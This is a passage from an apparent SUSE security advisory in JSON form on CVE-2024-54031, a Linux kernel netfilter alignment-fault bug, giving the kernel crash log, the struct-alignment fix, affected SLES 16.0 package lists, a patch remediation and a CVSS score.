"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_hash: unaligned atomic read on struct nft_set_ext\n\nAccess to genmask field in struct nft_set_ext results in unaligned\natomic read:\n\n[ 72.130109] Unable to handle kernel paging request at virtual address ffff0000c2bb708c\n[ 72.131036] Mem abort info:\n[ 72.131213] ESR = 0x0000000096000021\n[ 72.131446] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 72.132209] SET = 0, FnV = 0\n[ 72.133216] EA = 0, S1PTW = 0\n[ 72.134080] FSC = 0x21: alignment fault\n[ 72.135593] Data abort info:\n[ 72.137194] ISV = 0, ISS = 0x00000021, ISS2 = 0x00000000\n[ 72.142351] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 72.145989] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 72.150115] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000237d27000\n[ 72.154893] [ffff0000c2bb708c] pgd=0000000000000000, p4d=180000023ffff403, pud=180000023f84b403, pmd=180000023f835403,\n+pte=0068000102bb7707\n[ 72.163021] Internal error: Oops: 0000000096000021 [#1] SMP\n[...]\n[ 72.170041] CPU: 7 UID: 0 PID: 54 Comm: kworker/7:0 Tainted: G E 6.13.0-rc3+ #2\n[ 72.170509] Tainted: [E]=UNSIGNED_MODULE\n[ 72.170720] Hardware name: QEMU QEMU Virtual Machine, BIOS edk2-stable202302-for-qemu 03/01/2023\n[ 72.171192] Workqueue: events_power_efficient nft_rhash_gc [nf_tables]\n[ 72.171552] pstate: 21400005 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n[ 72.171915] pc : nft_rhash_gc+0x200/0x2d8 [nf_tables]\n[ 72.172166] lr : nft_rhash_gc+0x128/0x2d8 [nf_tables]\n[ 72.172546] sp : ffff800081f2bce0\n[ 72.172724] x29: ffff800081f2bd40 x28: ffff0000c2bb708c x27: 0000000000000038\n[ 72.173078] x26: ffff0000c6780ef0 x25: ffff0000c643df00 x24: ffff0000c6778f78\n[ 72.173431] x23: 000000000000001a x22: ffff0000c4b1f000 x21: ffff0000c6780f78\n[ 72.173782] x20: ffff0000c2bb70dc x19: ffff0000c2bb7080 x18: 0000000000000000\n[ 72.174135] x17: ffff0000c0a4e1c0 x16: 0000000000003000 x15: 0000ac26d173b978\n[ 72.174485] x14: ffffffffffffffff x13: 0000000000000030 x12: ffff0000c6780ef0\n[ 72.174841] x11: 0000000000000000 x10: ffff800081f2bcf8 x9 : ffff0000c3000000\n[ 72.175193] x8 : 00000000000004be x7 : 0000000000000000 x6 : 0000000000000000\n[ 72.175544] x5 : 0000000000000040 x4 : ffff0000c3000010 x3 : 0000000000000000\n[ 72.175871] x2 : 0000000000003a98 x1 : ffff0000c2bb708c x0 : 0000000000000004\n[ 72.176207] Call trace:\n[ 72.176316] nft_rhash_gc+0x200/0x2d8 [nf_tables] (P)\n[ 72.176653] process_one_work+0x178/0x3d0\n[ 72.176831] worker_thread+0x200/0x3f0\n[ 72.176995] kthread+0xe8/0xf8\n[ 72.177130] ret_from_fork+0x10/0x20\n[ 72.177289] Code: 54fff984 d503201f d2800080 91003261 (f820303f)\n[ 72.177557] ---[ end trace 0000000000000000 ]---\n\nAlign struct nft_set_ext to word size to address this and\ndocumentation it.\n\npahole reports that this increases the size of elements for rhash and\npipapo in 8 bytes on x86_64.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-54031",
"url": "https://www.suse.com/security/cve/CVE-2024-54031"
},
{
"category": "external",
"summary": "SUSE Bug 1235905 for CVE-2024-54031",
"url": "https://bugzilla.suse.com/1235905"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
